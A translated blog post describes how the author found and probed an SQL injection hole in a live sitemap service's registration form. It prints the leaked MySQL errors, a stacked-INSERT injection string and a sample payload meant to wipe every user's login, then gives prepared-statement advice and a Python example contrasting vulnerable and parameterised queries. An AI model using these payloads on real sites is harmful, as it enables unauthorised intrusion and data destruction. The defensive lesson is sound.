
The story of a single SQL injection

Good day!
I want to tell you how I hacked a large American sitemap service and remind you about protection against SQL injection. The post is for informational purposes only. But first things first.

Prehistory

For a number of my projects I needed to generate a couple of sitemaps. I googled and, among other things, found an American service for creating sitemaps (which required registration). I quickly entered some throwaway details (hoping the site did not verify the e-mail address) and the address of the site I wanted a sitemap for, then went back to more important things and forgot about it for a couple of days.

First steps

And here I am again, about to create a sitemap. I enter my details on the same site (this time the real ones) and the site address I had entered before. As a result of the form processing, the site displays this text:
FATAL ERROR: Duplicate entry 'http://gnum.me/' for key 2 FATAL ERROR: query: INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, 'http://gnum.me/', 'fsga6a59.txt', '1','1','0','0','0', NOW()); 

The text means that this site is already in the database. An idea came to me: why not practise SQL injection a little, to make the Internet safer and to train my hacker skills.
To begin with, I checked whether the text entered into the registration form was validated for "cleanliness" at all, using this query:
 ', 'fsga6a59.txt', '1','1','0','0','0', NOW()); INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178818, 'http://yg480ybv034df.me/ 

')
The point is that I close the first part of the query (the site's own prefix):
 INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, ' 

Code:
 ', 'fsga6a59.txt', '1','1','0','0','0', NOW()); 

And I close the trailing part of the query (the tail the site itself appends):
 ', 'fsga6a59.txt', '1','1','0','0','0', NOW()); 

Code:
 INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178818, 'http://yg480ybv034df.me/ 


Query result:
 FATAL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useup' at line 1 FATAL ERROR: query: INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178959, '', 'fsga6a59.txt', '1','1','0','0','0', NOW()); INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, 'http://yg480ybv034df.me/', 'fsgf47a8.txt', '1','1','0','0','0', NOW()); 


Result analysis

I learned two things:

  1. the text I enter is not checked for malicious code;
  2. the site's creators limited the length (to 125 characters), so the query up to this point:

 load, useping, usepingbing, createdate) VALUES (178817, 'http://yg480ybv034df.me/', 'fsgf47a8.txt', '1','1','0','0','0', NOW()) 

goes through normally.

Summary

In principle everything is clear now: I can enter any code up to 125 characters in this field. What comes next is a matter of imagination, for example:
 ', 'fsga6a59.txt', '1','1','0','0','0', NOW()); UPDATE uses SET login=' ' 

This query would wipe out all users' logins.

I sent information about the hole to the site. The task is done: now our data will be a little more secure.

Do not forget to validate the text entered by the client.

UPD1:
Advice on correct connections and SQL queries from imater and FanatPHP.
Connect:
 // Build the DSN from the config and open the connection
 $dsn = "mysql:dbname=$config[dbname];host=$config[host];charset=$config[charset]";
 // Throw exceptions on errors instead of echoing the raw query text to the user
 $conf = array(PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION);
 $pdo = new PDO($dsn, $config["user"], $config["pass"], $conf);


Process input text:
 // Prepared statement: user input is bound as data, never spliced into the SQL text
 $query = $pdo->prepare("SELECT * FROM tree WHERE text LIKE :title OR id = :id");
 $query->execute(array(":title" => "%24938239823908%", ":id" => $_GET['sync3']));
 while ($row = $query->fetch()) echo $row['fio'];


UPD2: Thanks to the comments from zerkms, I want to remind you about prepared statements:
Using prepared statements brings many benefits for both security and performance. Prepared statements improve security by separating the logic of the SQL query from the data inserted into it. This separation of logic and data helps prevent SQL injection. Normally, when you run queries that use data coming from users, you have to be very careful: you use functions that escape problem characters such as single and double quotes and backslashes. These operations are unnecessary when you use prepared statements. Separating the data from the query logic lets MySQL handle these characters automatically, without resorting to special functions.
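To show the difference between the concatenated query the site evidently built (the probe analysed above) and the prepared statement recommended here, the following is an added example, not code from the original post, using Python's sqlite3 as an in-memory stand-in for MySQL; the table schema, the user ids and the example domain are assumptions, and the column list comes from the error message quoted in the post.

```python
import sqlite3

# Column list copied from the error message quoted in the post.
COLUMNS = ("userid, url, verifyfile, usetimestamp, usepriority, "
           "useupload, useping, usepingbing, createdate")

# Constructed probe in the shape the post describes: it closes the quoted url
# value and the VALUES list, then starts a second INSERT (domain is made up).
PROBE = ("', 'fsga6a59.txt', '1','1','0','0','0', datetime('now')); INSERT INTO site ("
         + COLUMNS + ") VALUES (178818, 'http://example.invalid/")


def fresh_db():
    """In-memory stand-in for the site table; the schema is an assumption."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE site (userid INTEGER, url TEXT UNIQUE, verifyfile TEXT,"
                " usetimestamp TEXT, usepriority TEXT, useupload TEXT, useping TEXT,"
                " usepingbing TEXT, createdate TEXT)")
    return con


def insert_vulnerable(con, userid, url, verifyfile):
    """String concatenation, as the site evidently did: user text becomes SQL.
    Returns ('ok', stored_url) or ('error', driver message)."""
    sql = (f"INSERT INTO site ({COLUMNS}) VALUES ({userid}, '{url}', '{verifyfile}',"
           f" '1','1','0','0','0', datetime('now'))")
    try:
        con.execute(sql)
    except (sqlite3.Error, sqlite3.Warning) as exc:  # syntax error, stacked statement...
        return ("error", str(exc))
    row = con.execute("SELECT url FROM site WHERE userid = ?", (userid,)).fetchone()
    return ("ok", row[0])


def insert_safe(con, userid, url, verifyfile):
    """Parameterised form: url and verifyfile are bound as data, so a quote or a
    semicolon inside them is stored literally and never reaches the SQL parser."""
    con.execute(f"INSERT INTO site ({COLUMNS}) VALUES (?, ?, ?, '1','1','0','0','0',"
                " datetime('now'))", (userid, url, verifyfile))
    row = con.execute("SELECT url FROM site WHERE userid = ?", (userid,)).fetchone()
    return row[0]


if __name__ == "__main__":
    db = fresh_db()
    print(insert_vulnerable(db, 1, "http://gnum.me/", "a.txt"))  # ('ok', ...)
    print(insert_vulnerable(db, 2, PROBE, "b.txt"))              # ('error', ...): input became SQL
    print(insert_vulnerable(db, 3, "it's", "c.txt"))             # ('error', ...): one quote breaks it
    print(insert_safe(db, 4, PROBE, "d.txt") == PROBE)           # True: stored verbatim
```

Like the site's MySQL driver, sqlite3 refuses to run two statements in one execute() call, so the probe ends in an error here rather than a second row; the quote still reaches the SQL parser, so that driver behaviour is not a defence, only binding the value as data is.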

Thank you for your attention. Please don't judge my first post too harshly.

Source: https://habr.com/ru/post/168079/
